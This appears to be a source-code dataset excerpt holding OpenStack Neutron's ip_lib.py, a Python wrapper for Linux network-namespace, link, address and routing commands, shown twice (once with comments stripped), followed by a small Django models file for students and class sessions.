output = utils.execute(['ip', 'netns', 'exec', self.namespace,
'find', SYS_NET_PATH, '-maxdepth', '1',
'-type', 'l', '-printf', '%f '],
run_as_root=True,
log_fail_as_error=self.log_fail_as_error
).split()
else:
output = (
i for i in os.listdir(SYS_NET_PATH)
if os.path.islink(os.path.join(SYS_NET_PATH, i))
)
for name in output:
if exclude_loopback and name == LOOPBACK_DEVNAME:
continue
retval.append(IPDevice(name, namespace=self.namespace))
return retval
def add_tuntap(self, name, mode='tap'):
self._as_root([], 'tuntap', ('add', name, 'mode', mode))
return IPDevice(name, namespace=self.namespace)
def add_veth(self, name1, name2, namespace2=None):
args = ['add', name1, 'type', 'veth', 'peer', 'name', name2]
if namespace2 is None:
namespace2 = self.namespace
else:
self.ensure_namespace(namespace2)
args += ['netns', namespace2]
self._as_root([], 'link', tuple(args))
return (IPDevice(name1, namespace=self.namespace),
IPDevice(name2, namespace=namespace2))
def del_veth(self, name):
"""Delete a virtual interface between two namespaces."""
self._as_root([], 'link', ('del', name))
def ensure_namespace(self, name):
if not self.netns.exists(name):
ip = self.netns.add(name)
lo = ip.device(LOOPBACK_DEVNAME)
lo.link.set_up()
else:
ip = IPWrapper(namespace=name)
return ip
def namespace_is_empty(self):
return not self.get_devices(exclude_loopback=True)
def garbage_collect_namespace(self):
"""Conditionally destroy the namespace if it is empty."""
if self.namespace and self.netns.exists(self.namespace):
if self.namespace_is_empty():
self.netns.delete(self.namespace)
return True
return False
def add_device_to_namespace(self, device):
if self.namespace:
device.link.set_netns(self.namespace)
def add_vxlan(self, name, vni, group=None, dev=None, ttl=None, tos=None,
local=None, port=None, proxy=False):
cmd = ['add', name, 'type', 'vxlan', 'id', vni]
if group:
cmd.extend(['group', group])
if dev:
cmd.extend(['dev', dev])
if ttl:
cmd.extend(['ttl', ttl])
if tos:
cmd.extend(['tos', tos])
if local:
cmd.extend(['local', local])
if proxy:
cmd.append('proxy')
# tuple: min,max
if port and len(port) == 2:
cmd.extend(['port', port[0], port[1]])
elif port:
raise exceptions.NetworkVxlanPortRangeError(vxlan_range=port)
self._as_root([], 'link', cmd)
return (IPDevice(name, namespace=self.namespace))
@classmethod
def get_namespaces(cls):
output = cls._execute([], 'netns', ('list',))
return [l.strip() for l in output.split('\n')]
class IPDevice(SubProcessBase):
def __init__(self, name, namespace=None):
super(IPDevice, self).__init__(namespace=namespace)
self.name = name
self.link = IpLinkCommand(self)
self.addr = IpAddrCommand(self)
self.route = IpRouteCommand(self)
self.neigh = IpNeighCommand(self)
def __eq__(self, other):
return (other is not None and self.name == other.name
and self.namespace == other.namespace)
def __str__(self):
return self.name
class IpCommandBase(object):
COMMAND = ''
def __init__(self, parent):
self._parent = parent
def _run(self, options, args):
return self._parent._run(options, self.COMMAND, args)
def _as_root(self, options, args, use_root_namespace=False):
return self._parent._as_root(options,
self.COMMAND,
args,
use_root_namespace=use_root_namespace)
class IPRule(SubProcessBase):
def __init__(self, namespace=None):
super(IPRule, self).__init__(namespace=namespace)
self.rule = IpRuleCommand(self)
class IpRuleCommand(IpCommandBase):
COMMAND = 'rule'
def _exists(self, ip, ip_version, table, rule_pr):
# Typical rule from 'ip rule show':
# 4030201: from 1.2.3.4/24 lookup 10203040
rule_pr = str(rule_pr) + ":"
for line in self._as_root([ip_version], ['show']).splitlines():
parts = line.split()
if parts and (parts[0] == rule_pr and
parts[2] == str(ip) and
parts[-1] == str(table)):
return True
return False
def add(self, ip, table, rule_pr):
ip_version = get_ip_version(ip)
if not self._exists(ip, ip_version, table, rule_pr):
args = ['add', 'from', ip, 'table', table, 'priority', rule_pr]
self._as_root([ip_version], tuple(args))
def delete(self, ip, table, rule_pr):
ip_version = get_ip_version(ip)
args = ['del', 'table', table, 'priority', rule_pr]
self._as_root([ip_version], tuple(args))
class IpDeviceCommandBase(IpCommandBase):
@property
def name(self):
return self._parent.name
class IpLinkCommand(IpDeviceCommandBase):
COMMAND = 'link'
def set_address(self, mac_address):
self._as_root([], ('set', self.name, 'address', mac_address))
def set_mtu(self, mtu_size):
self._as_root([], ('set', self.name, 'mtu', mtu_size))
def set_up(self):
self._as_root([], ('set', self.name, 'up'))
def set_down(self):
self._as_root([], ('set', self.name, 'down'))
def set_netns(self, namespace):
self._as_root([], ('set', self.name, 'netns', namespace))
self._parent.namespace = namespace
def set_name(self, name):
self._as_root([], ('set', self.name, 'name', name))
self._parent.name = name
def set_alias(self, alias_name):
self._as_root([], ('set', self.name, 'alias', alias_name))
def delete(self):
self._as_root([], ('delete', self.name))
@property
def address(self):
return self.attributes.get('link/ether')
@property
def state(self):
return self.attributes.get('state')
@property
def mtu(self):
return self.attributes.get('mtu')
@property
def qdisc(self):
return self.attributes.get('qdisc')
@property
def qlen(self):
return self.attributes.get('qlen')
@property
def alias(self):
return self.attributes.get('alias')
@property
def attributes(self):
return self._parse_line(self._run(['o'], ('show', self.name)))
def _parse_line(self, value):
if not value:
return {}
device_name, settings = value.replace("\\", '').split('>', 1)
tokens = settings.split()
keys = tokens[::2]
values = [int(v) if v.isdigit() else v for v in tokens[1::2]]
retval = dict(zip(keys, values))
return retval
class IpAddrCommand(IpDeviceCommandBase):
COMMAND = 'addr'
def add(self, cidr, scope='global'):
net = netaddr.IPNetwork(cidr)
args = ['add', cidr,
'scope', scope,
'dev', self.name]
if net.version == 4:
args += ['brd', str(net.broadcast)]
self._as_root([net.version], tuple(args))
def delete(self, cidr):
ip_version = get_ip_version(cidr)
self._as_root([ip_version],
('del', cidr,
'dev', self.name))
def flush(self, ip_version):
self._as_root([ip_version], ('flush', self.name))
def list(self, scope=None, to=None, filters=None, ip_version=None):
options = [ip_version] if ip_version else []
args = ['show', self.name]
if filters:
args += filters
retval = []
if scope:
args += ['scope', scope]
if to:
args += ['to', to]
for line in self._run(options, tuple(args)).split('\n'):
line = line.strip()
if not line.startswith('inet'):
continue
parts = line.split()
if parts[0] == 'inet6':
scope = parts[3]
else:
if parts[2] == 'brd':
scope = parts[5]
else:
scope = parts[3]
retval.append(dict(cidr=parts[1],
scope=scope,
dynamic=('dynamic' == parts[-1])))
return retval
class IpRouteCommand(IpDeviceCommandBase):
COMMAND = 'route'
def add_gateway(self, gateway, metric=None, table=None):
ip_version = get_ip_version(gateway)
args = ['replace', 'default', 'via', gateway]
if metric:
args += ['metric', metric]
args += ['dev', self.name]
if table:
args += ['table', table]
self._as_root([ip_version], tuple(args))
def delete_gateway(self, gateway, table=None):
ip_version = get_ip_version(gateway)
args = ['del', 'default',
'via', gateway,
'dev', self.name]
if table:
args += ['table', table]
self._as_root([ip_version], tuple(args))
def list_onlink_routes(self, ip_version):
def iterate_routes():
output = self._run([ip_version],
('list',
'dev', self.name,
'scope', 'link'))
for line in output.split('\n'):
line = line.strip()
if line and not line.count('src'):
yield line
return [x for x in iterate_routes()]
def add_onlink_route(self, cidr):
ip_version = get_ip_version(cidr)
self._as_root([ip_version],
('replace', cidr,
'dev', self.name,
'scope', 'link'))
def delete_onlink_route(self, cidr):
ip_version = get_ip_version(cidr)
self._as_root([ip_version],
('del', cidr,
'dev', self.name,
'scope', 'link'))
def get_gateway(self, scope=None, filters=None, ip_version=None):
options = [ip_version] if ip_version else []
args = ['list', 'dev', self.name]
if filters:
args += filters
retval = None
if scope:
args += ['scope', scope]
route_list_lines = self._run(options, tuple(args)).split('\n')
default_route_line = next((x.strip() for x in
route_list_lines if
x.strip().startswith('default')), None)
if default_route_line:
gateway_index = 2
parts = default_route_line.split()
retval = dict(gateway=parts[gateway_index])
if 'metric' in parts:
metric_index = parts.index('metric') + 1
retval.update(metric=int(parts[metric_index]))
return retval
def pullup_route(self, interface_name):
"""Ensures that the route entry for the interface is before all
others on the same subnet.
"""
device_list = []
device_route_list_lines = self._run([],
('list',
'proto', 'kernel',
'dev', interface_name)
).split('\n')
for device_route_line in device_route_list_lines:
try:
subnet = device_route_line.split()[0]
except Exception:
continue
subnet_route_list_lines = self._run([],
('list',
'proto', 'kernel',
'match', subnet)
).split('\n')
for subnet_route_line in subnet_route_list_lines:
i = iter(subnet_route_line.split())
while(i.next() != 'dev'):
pass
device = i.next()
try:
while(i.next() != 'src'):
pass
src = i.next()
except Exception:
src = ''
if device != interface_name:
device_list.append((device, src))
else:
break
for (device, src) in device_list:
self._as_root([], ('del', subnet, 'dev', device))
if (src != ''):
self._as_root([],
('append', subnet,
'proto', 'kernel',
'src', src,
'dev', device))
else:
self._as_root([],
('append', subnet,
'proto', 'kernel',
'dev', device))
def add_route(self, cidr, ip, table=None):
ip_version = get_ip_version(cidr)
args = ['replace', cidr, 'via', ip, 'dev', self.name]
if table:
args += ['table', table]
self._as_root([ip_version], tuple(args))
def delete_route(self, cidr, ip, table=None):
ip_version = get_ip_version(cidr)
args = ['del', cidr, 'via', ip, 'dev', self.name]
if table:
args += ['table', table]
self._as_root([ip_version], tuple(args))
class IpNeighCommand(IpDeviceCommandBase):
COMMAND = 'neigh'
def add(self, ip_address, mac_address):
ip_version = get_ip_version(ip_address)
self._as_root([ip_version],
('replace', ip_address,
'lladdr', mac_address,
'nud', 'permanent',
'dev', self.name))
def delete(self, ip_address, mac_address):
ip_version = get_ip_version(ip_address)
self._as_root([ip_version],
('del', ip_address,
'lladdr', mac_address,
'dev', self.name))
class IpNetnsCommand(IpCommandBase):
COMMAND = 'netns'
def add(self, name):
self._as_root([], ('add', name), use_root_namespace=True)
wrapper = IPWrapper(namespace=name)
wrapper.netns.execute(['sysctl', '-w',
'net.ipv4.conf.all.promote_secondaries=1'])
return wrapper
def delete(self, name):
self._as_root([], ('delete', name), use_root_namespace=True)
def execute(self, cmds, addl_env=None, check_exit_code=True,
extra_ok_codes=None):
ns_params = []
kwargs = {}
if self._parent.namespace:
kwargs['run_as_root'] = True
ns_params = ['ip', 'netns', 'exec', self._parent.namespace]
env_params = []
if addl_env:
env_params = (['env'] +
['%s=%s' % pair for pair in addl_env.items()])
cmd = ns_params + env_params + list(cmds)
return utils.execute(cmd, check_exit_code=check_exit_code,
extra_ok_codes=extra_ok_codes, **kwargs)
def exists(self, name):
output = self._parent._execute(
['o'], 'netns', ['list'],
run_as_root=cfg.CONF.AGENT.use_helper_for_ns_read)
for line in output.split('\n'):
if name == line.strip():
return True
return False
def device_exists(device_name, namespace=None):
"""Return True if the device exists in the namespace."""
try:
dev = IPDevice(device_name, namespace=namespace)
dev.set_log_fail_as_error(False)
address = dev.link.address
except RuntimeError:
return False
return bool(address)
def device_exists_with_ip_mac(device_name, ip_cidr, mac, namespace=None):
"""Return True if the device with the given IP and MAC addresses
exists in the namespace.
"""
try:
device = IPDevice(device_name, namespace=namespace)
if mac != device.link.address:
return False
if ip_cidr not in (ip['cidr'] for ip in device.addr.list()):
return False
except RuntimeError:
return False
else:
return True
def get_routing_table(namespace=None):
"""Return a list of dictionaries, each representing a route.
The dictionary format is: {'destination': cidr,
'nexthop': ip,
'device': device_name}
"""
ip_wrapper = IPWrapper(namespace=namespace)
table = ip_wrapper.netns.execute(['ip', 'route'], check_exit_code=True)
routes = []
# Example for route_lines:
# default via 192.168.3.120 dev wlp3s0 proto static metric 1024
# 10.0.0.0/8 dev tun0 proto static scope link metric 1024
# The first column is the destination, followed by key/value pairs.
# The generator splits the routing table by newline, then strips and splits
# each individual line.
route_lines = (line.split() for line in table.split('\n') if line.strip())
for route in route_lines:
network = route[0]
# Create a dict of key/value pairs (For example - 'dev': 'tun0')
# excluding the first column.
data = dict(route[i:i + 2] for i in range(1, len(route), 2))
routes.append({'destination': network,
'nexthop': data.get('via'),
'device': data.get('dev')})
return routes
def ensure_device_is_ready(device_name, namespace=None):
dev = IPDevice(device_name, namespace=namespace)
dev.set_log_fail_as_error(False)
try:
# Ensure the device is up, even if it is already up. If the device
# doesn't exist, a RuntimeError will be raised.
dev.link.set_up()
except RuntimeError:
return False
return True
def iproute_arg_supported(command, arg):
command += ['help']
stdout, stderr = utils.execute(command, check_exit_code=False,
return_stderr=True)
return any(arg in line for line in stderr.split('\n'))
def _arping(ns_name, iface_name, address, count):
# Pass -w to set timeout to ensure exit if interface removed while running
arping_cmd = ['arping', '-A', '-I', iface_name, '-c', count,
'-w', 1.5 * count, address]
try:
ip_wrapper = IPWrapper(namespace=ns_name)
ip_wrapper.netns.execute(arping_cmd, check_exit_code=True)
except Exception:
msg = _LE("Failed sending gratuitous ARP "
"to %(addr)s on %(iface)s in namespace %(ns)s")
LOG.exception(msg, {'addr': address,
'iface': iface_name,
'ns': ns_name})
def send_gratuitous_arp(ns_name, iface_name, address, count):
"""Send a gratuitous arp using given namespace, interface, and address."""
def arping():
_arping(ns_name, iface_name, address, count)
if count > 0:
eventlet.spawn_n(arping)
def send_garp_for_proxyarp(ns_name, iface_name, address, count):
"""
Send a gratuitous arp using given namespace, interface, and address
This version should be used when proxy arp is in use since the interface
won't actually have the address configured. We actually need to configure
the address on the interface and then remove it when the proxy arp has been
sent.
"""
def arping_with_temporary_address():
# Configure the address on the interface
device = IPDevice(iface_name, namespace=ns_name)
net = netaddr.IPNetwork(str(address))
device.addr.add(str(net))
_arping(ns_name, iface_name, address, count)
# Delete the address from the interface
device.addr.delete(str(net))
if count > 0:
eventlet.spawn_n(arping_with_temporary_address)
def add_namespace_to_cmd(cmd, namespace=None):
"""Add an optional namespace to the command."""
return ['ip', 'netns', 'exec', namespace] + cmd if namespace else cmd
def get_ip_version(ip_or_cidr):
return netaddr.IPNetwork(ip_or_cidr).version
| 34.068056 | 79 | 0.555669 |
import eventlet
import netaddr
import os
from oslo_config import cfg
from oslo_log import log as logging
from neutron.agent.linux import utils
from neutron.common import exceptions
from neutron.i18n import _LE
LOG = logging.getLogger(__name__)
OPTS = [
cfg.BoolOpt('ip_lib_force_root',
default=False,
help=_('Force ip_lib calls to use the root helper')),
]
LOOPBACK_DEVNAME = 'lo'
SYS_NET_PATH = '/sys/class/net'
class SubProcessBase(object):
def __init__(self, namespace=None,
log_fail_as_error=True):
self.namespace = namespace
self.log_fail_as_error = log_fail_as_error
try:
self.force_root = cfg.CONF.ip_lib_force_root
except cfg.NoSuchOptError:
self.force_root = False
def _run(self, options, command, args):
if self.namespace:
return self._as_root(options, command, args)
elif self.force_root:
return self._execute(options, command, args, run_as_root=True,
log_fail_as_error=self.log_fail_as_error)
else:
return self._execute(options, command, args,
log_fail_as_error=self.log_fail_as_error)
def _as_root(self, options, command, args, use_root_namespace=False):
namespace = self.namespace if not use_root_namespace else None
return self._execute(options, command, args, run_as_root=True,
namespace=namespace,
log_fail_as_error=self.log_fail_as_error)
@classmethod
def _execute(cls, options, command, args, run_as_root=False,
namespace=None, log_fail_as_error=True):
opt_list = ['-%s' % o for o in options]
ip_cmd = add_namespace_to_cmd(['ip'], namespace)
cmd = ip_cmd + opt_list + [command] + list(args)
return utils.execute(cmd, run_as_root=run_as_root,
log_fail_as_error=log_fail_as_error)
def set_log_fail_as_error(self, fail_with_error):
self.log_fail_as_error = fail_with_error
class IPWrapper(SubProcessBase):
def __init__(self, namespace=None):
super(IPWrapper, self).__init__(namespace=namespace)
self.netns = IpNetnsCommand(self)
def device(self, name):
return IPDevice(name, namespace=self.namespace)
def get_devices(self, exclude_loopback=False):
retval = []
if self.namespace:
output = utils.execute(['ip', 'netns', 'exec', self.namespace,
'find', SYS_NET_PATH, '-maxdepth', '1',
'-type', 'l', '-printf', '%f '],
run_as_root=True,
log_fail_as_error=self.log_fail_as_error
).split()
else:
output = (
i for i in os.listdir(SYS_NET_PATH)
if os.path.islink(os.path.join(SYS_NET_PATH, i))
)
for name in output:
if exclude_loopback and name == LOOPBACK_DEVNAME:
continue
retval.append(IPDevice(name, namespace=self.namespace))
return retval
def add_tuntap(self, name, mode='tap'):
self._as_root([], 'tuntap', ('add', name, 'mode', mode))
return IPDevice(name, namespace=self.namespace)
def add_veth(self, name1, name2, namespace2=None):
args = ['add', name1, 'type', 'veth', 'peer', 'name', name2]
if namespace2 is None:
namespace2 = self.namespace
else:
self.ensure_namespace(namespace2)
args += ['netns', namespace2]
self._as_root([], 'link', tuple(args))
return (IPDevice(name1, namespace=self.namespace),
IPDevice(name2, namespace=namespace2))
def del_veth(self, name):
self._as_root([], 'link', ('del', name))
def ensure_namespace(self, name):
if not self.netns.exists(name):
ip = self.netns.add(name)
lo = ip.device(LOOPBACK_DEVNAME)
lo.link.set_up()
else:
ip = IPWrapper(namespace=name)
return ip
def namespace_is_empty(self):
return not self.get_devices(exclude_loopback=True)
def garbage_collect_namespace(self):
if self.namespace and self.netns.exists(self.namespace):
if self.namespace_is_empty():
self.netns.delete(self.namespace)
return True
return False
def add_device_to_namespace(self, device):
if self.namespace:
device.link.set_netns(self.namespace)
def add_vxlan(self, name, vni, group=None, dev=None, ttl=None, tos=None,
local=None, port=None, proxy=False):
cmd = ['add', name, 'type', 'vxlan', 'id', vni]
if group:
cmd.extend(['group', group])
if dev:
cmd.extend(['dev', dev])
if ttl:
cmd.extend(['ttl', ttl])
if tos:
cmd.extend(['tos', tos])
if local:
cmd.extend(['local', local])
if proxy:
cmd.append('proxy')
if port and len(port) == 2:
cmd.extend(['port', port[0], port[1]])
elif port:
raise exceptions.NetworkVxlanPortRangeError(vxlan_range=port)
self._as_root([], 'link', cmd)
return (IPDevice(name, namespace=self.namespace))
@classmethod
def get_namespaces(cls):
output = cls._execute([], 'netns', ('list',))
return [l.strip() for l in output.split('\n')]
class IPDevice(SubProcessBase):
def __init__(self, name, namespace=None):
super(IPDevice, self).__init__(namespace=namespace)
self.name = name
self.link = IpLinkCommand(self)
self.addr = IpAddrCommand(self)
self.route = IpRouteCommand(self)
self.neigh = IpNeighCommand(self)
def __eq__(self, other):
return (other is not None and self.name == other.name
and self.namespace == other.namespace)
def __str__(self):
return self.name
class IpCommandBase(object):
COMMAND = ''
def __init__(self, parent):
self._parent = parent
def _run(self, options, args):
return self._parent._run(options, self.COMMAND, args)
def _as_root(self, options, args, use_root_namespace=False):
return self._parent._as_root(options,
self.COMMAND,
args,
use_root_namespace=use_root_namespace)
class IPRule(SubProcessBase):
def __init__(self, namespace=None):
super(IPRule, self).__init__(namespace=namespace)
self.rule = IpRuleCommand(self)
class IpRuleCommand(IpCommandBase):
COMMAND = 'rule'
def _exists(self, ip, ip_version, table, rule_pr):
rule_pr = str(rule_pr) + ":"
for line in self._as_root([ip_version], ['show']).splitlines():
parts = line.split()
if parts and (parts[0] == rule_pr and
parts[2] == str(ip) and
parts[-1] == str(table)):
return True
return False
def add(self, ip, table, rule_pr):
ip_version = get_ip_version(ip)
if not self._exists(ip, ip_version, table, rule_pr):
args = ['add', 'from', ip, 'table', table, 'priority', rule_pr]
self._as_root([ip_version], tuple(args))
def delete(self, ip, table, rule_pr):
ip_version = get_ip_version(ip)
args = ['del', 'table', table, 'priority', rule_pr]
self._as_root([ip_version], tuple(args))
class IpDeviceCommandBase(IpCommandBase):
@property
def name(self):
return self._parent.name
class IpLinkCommand(IpDeviceCommandBase):
COMMAND = 'link'
def set_address(self, mac_address):
self._as_root([], ('set', self.name, 'address', mac_address))
def set_mtu(self, mtu_size):
self._as_root([], ('set', self.name, 'mtu', mtu_size))
def set_up(self):
self._as_root([], ('set', self.name, 'up'))
def set_down(self):
self._as_root([], ('set', self.name, 'down'))
def set_netns(self, namespace):
self._as_root([], ('set', self.name, 'netns', namespace))
self._parent.namespace = namespace
def set_name(self, name):
self._as_root([], ('set', self.name, 'name', name))
self._parent.name = name
def set_alias(self, alias_name):
self._as_root([], ('set', self.name, 'alias', alias_name))
def delete(self):
self._as_root([], ('delete', self.name))
@property
def address(self):
return self.attributes.get('link/ether')
@property
def state(self):
return self.attributes.get('state')
@property
def mtu(self):
return self.attributes.get('mtu')
@property
def qdisc(self):
return self.attributes.get('qdisc')
@property
def qlen(self):
return self.attributes.get('qlen')
@property
def alias(self):
return self.attributes.get('alias')
@property
def attributes(self):
return self._parse_line(self._run(['o'], ('show', self.name)))
def _parse_line(self, value):
if not value:
return {}
device_name, settings = value.replace("\\", '').split('>', 1)
tokens = settings.split()
keys = tokens[::2]
values = [int(v) if v.isdigit() else v for v in tokens[1::2]]
retval = dict(zip(keys, values))
return retval
class IpAddrCommand(IpDeviceCommandBase):
COMMAND = 'addr'
def add(self, cidr, scope='global'):
net = netaddr.IPNetwork(cidr)
args = ['add', cidr,
'scope', scope,
'dev', self.name]
if net.version == 4:
args += ['brd', str(net.broadcast)]
self._as_root([net.version], tuple(args))
def delete(self, cidr):
ip_version = get_ip_version(cidr)
self._as_root([ip_version],
('del', cidr,
'dev', self.name))
def flush(self, ip_version):
self._as_root([ip_version], ('flush', self.name))
def list(self, scope=None, to=None, filters=None, ip_version=None):
options = [ip_version] if ip_version else []
args = ['show', self.name]
if filters:
args += filters
retval = []
if scope:
args += ['scope', scope]
if to:
args += ['to', to]
for line in self._run(options, tuple(args)).split('\n'):
line = line.strip()
if not line.startswith('inet'):
continue
parts = line.split()
if parts[0] == 'inet6':
scope = parts[3]
else:
if parts[2] == 'brd':
scope = parts[5]
else:
scope = parts[3]
retval.append(dict(cidr=parts[1],
scope=scope,
dynamic=('dynamic' == parts[-1])))
return retval
class IpRouteCommand(IpDeviceCommandBase):
COMMAND = 'route'
def add_gateway(self, gateway, metric=None, table=None):
ip_version = get_ip_version(gateway)
args = ['replace', 'default', 'via', gateway]
if metric:
args += ['metric', metric]
args += ['dev', self.name]
if table:
args += ['table', table]
self._as_root([ip_version], tuple(args))
def delete_gateway(self, gateway, table=None):
ip_version = get_ip_version(gateway)
args = ['del', 'default',
'via', gateway,
'dev', self.name]
if table:
args += ['table', table]
self._as_root([ip_version], tuple(args))
def list_onlink_routes(self, ip_version):
def iterate_routes():
output = self._run([ip_version],
('list',
'dev', self.name,
'scope', 'link'))
for line in output.split('\n'):
line = line.strip()
if line and not line.count('src'):
yield line
return [x for x in iterate_routes()]
def add_onlink_route(self, cidr):
ip_version = get_ip_version(cidr)
self._as_root([ip_version],
('replace', cidr,
'dev', self.name,
'scope', 'link'))
def delete_onlink_route(self, cidr):
ip_version = get_ip_version(cidr)
self._as_root([ip_version],
('del', cidr,
'dev', self.name,
'scope', 'link'))
def get_gateway(self, scope=None, filters=None, ip_version=None):
options = [ip_version] if ip_version else []
args = ['list', 'dev', self.name]
if filters:
args += filters
retval = None
if scope:
args += ['scope', scope]
route_list_lines = self._run(options, tuple(args)).split('\n')
default_route_line = next((x.strip() for x in
route_list_lines if
x.strip().startswith('default')), None)
if default_route_line:
gateway_index = 2
parts = default_route_line.split()
retval = dict(gateway=parts[gateway_index])
if 'metric' in parts:
metric_index = parts.index('metric') + 1
retval.update(metric=int(parts[metric_index]))
return retval
def pullup_route(self, interface_name):
device_list = []
device_route_list_lines = self._run([],
('list',
'proto', 'kernel',
'dev', interface_name)
).split('\n')
for device_route_line in device_route_list_lines:
try:
subnet = device_route_line.split()[0]
except Exception:
continue
subnet_route_list_lines = self._run([],
('list',
'proto', 'kernel',
'match', subnet)
).split('\n')
for subnet_route_line in subnet_route_list_lines:
i = iter(subnet_route_line.split())
while(i.next() != 'dev'):
pass
device = i.next()
try:
while(i.next() != 'src'):
pass
src = i.next()
except Exception:
src = ''
if device != interface_name:
device_list.append((device, src))
else:
break
for (device, src) in device_list:
self._as_root([], ('del', subnet, 'dev', device))
if (src != ''):
self._as_root([],
('append', subnet,
'proto', 'kernel',
'src', src,
'dev', device))
else:
self._as_root([],
('append', subnet,
'proto', 'kernel',
'dev', device))
def add_route(self, cidr, ip, table=None):
ip_version = get_ip_version(cidr)
args = ['replace', cidr, 'via', ip, 'dev', self.name]
if table:
args += ['table', table]
self._as_root([ip_version], tuple(args))
def delete_route(self, cidr, ip, table=None):
ip_version = get_ip_version(cidr)
args = ['del', cidr, 'via', ip, 'dev', self.name]
if table:
args += ['table', table]
self._as_root([ip_version], tuple(args))
class IpNeighCommand(IpDeviceCommandBase):
COMMAND = 'neigh'
def add(self, ip_address, mac_address):
ip_version = get_ip_version(ip_address)
self._as_root([ip_version],
('replace', ip_address,
'lladdr', mac_address,
'nud', 'permanent',
'dev', self.name))
def delete(self, ip_address, mac_address):
ip_version = get_ip_version(ip_address)
self._as_root([ip_version],
('del', ip_address,
'lladdr', mac_address,
'dev', self.name))
class IpNetnsCommand(IpCommandBase):
COMMAND = 'netns'
def add(self, name):
self._as_root([], ('add', name), use_root_namespace=True)
wrapper = IPWrapper(namespace=name)
wrapper.netns.execute(['sysctl', '-w',
'net.ipv4.conf.all.promote_secondaries=1'])
return wrapper
def delete(self, name):
self._as_root([], ('delete', name), use_root_namespace=True)
def execute(self, cmds, addl_env=None, check_exit_code=True,
extra_ok_codes=None):
ns_params = []
kwargs = {}
if self._parent.namespace:
kwargs['run_as_root'] = True
ns_params = ['ip', 'netns', 'exec', self._parent.namespace]
env_params = []
if addl_env:
env_params = (['env'] +
['%s=%s' % pair for pair in addl_env.items()])
cmd = ns_params + env_params + list(cmds)
return utils.execute(cmd, check_exit_code=check_exit_code,
extra_ok_codes=extra_ok_codes, **kwargs)
def exists(self, name):
output = self._parent._execute(
['o'], 'netns', ['list'],
run_as_root=cfg.CONF.AGENT.use_helper_for_ns_read)
for line in output.split('\n'):
if name == line.strip():
return True
return False
def device_exists(device_name, namespace=None):
try:
dev = IPDevice(device_name, namespace=namespace)
dev.set_log_fail_as_error(False)
address = dev.link.address
except RuntimeError:
return False
return bool(address)
def device_exists_with_ip_mac(device_name, ip_cidr, mac, namespace=None):
try:
device = IPDevice(device_name, namespace=namespace)
if mac != device.link.address:
return False
if ip_cidr not in (ip['cidr'] for ip in device.addr.list()):
return False
except RuntimeError:
return False
else:
return True
def get_routing_table(namespace=None):
ip_wrapper = IPWrapper(namespace=namespace)
table = ip_wrapper.netns.execute(['ip', 'route'], check_exit_code=True)
routes = []
route_lines = (line.split() for line in table.split('\n') if line.strip())
for route in route_lines:
network = route[0]
data = dict(route[i:i + 2] for i in range(1, len(route), 2))
routes.append({'destination': network,
'nexthop': data.get('via'),
'device': data.get('dev')})
return routes
def ensure_device_is_ready(device_name, namespace=None):
dev = IPDevice(device_name, namespace=namespace)
dev.set_log_fail_as_error(False)
try:
dev.link.set_up()
except RuntimeError:
return False
return True
def iproute_arg_supported(command, arg):
command += ['help']
stdout, stderr = utils.execute(command, check_exit_code=False,
return_stderr=True)
return any(arg in line for line in stderr.split('\n'))
def _arping(ns_name, iface_name, address, count):
# Pass -w to set timeout to ensure exit if interface removed while running
arping_cmd = ['arping', '-A', '-I', iface_name, '-c', count,
'-w', 1.5 * count, address]
try:
ip_wrapper = IPWrapper(namespace=ns_name)
ip_wrapper.netns.execute(arping_cmd, check_exit_code=True)
except Exception:
msg = _LE("Failed sending gratuitous ARP "
"to %(addr)s on %(iface)s in namespace %(ns)s")
LOG.exception(msg, {'addr': address,
'iface': iface_name,
'ns': ns_name})
def send_gratuitous_arp(ns_name, iface_name, address, count):
def arping():
_arping(ns_name, iface_name, address, count)
if count > 0:
eventlet.spawn_n(arping)
def send_garp_for_proxyarp(ns_name, iface_name, address, count):
def arping_with_temporary_address():
# Configure the address on the interface
device = IPDevice(iface_name, namespace=ns_name)
net = netaddr.IPNetwork(str(address))
device.addr.add(str(net))
_arping(ns_name, iface_name, address, count)
# Delete the address from the interface
device.addr.delete(str(net))
if count > 0:
eventlet.spawn_n(arping_with_temporary_address)
def add_namespace_to_cmd(cmd, namespace=None):
return ['ip', 'netns', 'exec', namespace] + cmd if namespace else cmd
def get_ip_version(ip_or_cidr):
return netaddr.IPNetwork(ip_or_cidr).version
| true | true |
1c4aa4e22c898d243a62cb37a4da258b2d74fcfd | 1,829 | py | Python | imageRead/aluno/models.py | Sou-eu-Miguel/reply-card | d2b8716c02e593d627c6d88c7252c4abc897532b | [
"Apache-2.0"
] | 1 | 2018-12-12T21:36:10.000Z | 2018-12-12T21:36:10.000Z | imageRead/aluno/models.py | LucasLimakxy/reply-card | d2b8716c02e593d627c6d88c7252c4abc897532b | [
"Apache-2.0"
] | 6 | 2021-02-02T22:56:52.000Z | 2022-03-12T00:43:59.000Z | imageRead/aluno/models.py | Sou-eu-Miguel/reply-card | d2b8716c02e593d627c6d88c7252c4abc897532b | [
"Apache-2.0"
] | 1 | 2018-12-13T20:58:16.000Z | 2018-12-13T20:58:16.000Z | from decimal import Decimal
from django.core.validators import MinValueValidator
from django.db import models
from django.urls import reverse
from ..turma.models import Turma, Sessao
# Create your models here.
class Aluno(models.Model):
nome = models.CharField('Nome', max_length=60)
matricula = models.CharField('matricula', max_length=11, unique=True)
turma = models.ForeignKey(Turma, on_delete=False, blank=True)
# Retorna o nome dos atributos
def __str__(self):
return self.matricula + ' - ' + self.nome
# Formatacao do nome da classe
class Meta:
verbose_name = 'Aluno'
verbose_name_plural = 'Alunos'
ordering = ['nome', 'matricula']
def get_absolute_url(self):
return reverse('aluno-turma-list', kwargs={'pk': self.pk})
class AlunoSessao(models.Model):
aluno = models.ForeignKey(Aluno, on_delete= models.CASCADE)
sessao = models.ForeignKey(Sessao, on_delete=models.CASCADE)
media = models.DecimalField('Média', decimal_places=2, max_digits=12, validators=[MinValueValidator(Decimal('0.01'))])
descricao_alterativas = models.CharField('Descrição de Alterativas', max_length=60, blank=True)
descricao_pontuacao = models.CharField('Descrição de Pontuação', max_length=60, blank=True)
# Retorna o nome dos atributos
def __str__(self):
return "{} - {}".format(self.aluno.nome, self.sessao.questionario.nome)
# Formatacao do nome da classe
class Meta:
verbose_name = 'AlunoSessao'
verbose_name_plural = 'AlunosSessao'
ordering = ['aluno', 'sessao','media']
def get_absolute_url(self):
return reverse('aluno-turma-list', kwargs={'pk': self.sessao.turma.pk})
| 38.104167 | 140 | 0.65883 | from decimal import Decimal
from django.core.validators import MinValueValidator
from django.db import models
from django.urls import reverse
from ..turma.models import Turma, Sessao
